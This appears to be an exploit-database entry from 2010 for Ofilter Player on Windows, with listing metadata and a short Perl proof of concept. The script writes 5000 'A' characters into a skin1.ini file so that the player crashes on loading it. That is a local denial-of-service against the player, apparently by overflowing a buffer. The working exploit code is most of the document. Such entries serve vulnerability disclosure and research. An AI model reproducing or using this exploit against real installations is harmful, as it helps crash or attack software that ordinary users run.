Ofilter Player - 'skin.ini' Local Crash (PoC)

Author: Rehan Ahmed
type: dos
platform: windows
port: 
date_added: 2010-01-12  
date_updated:   
verified: 1  
codes: OSVDB-63686  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comOfilterPlayer.exe  

raw file: 11130.pl  
#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2

my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";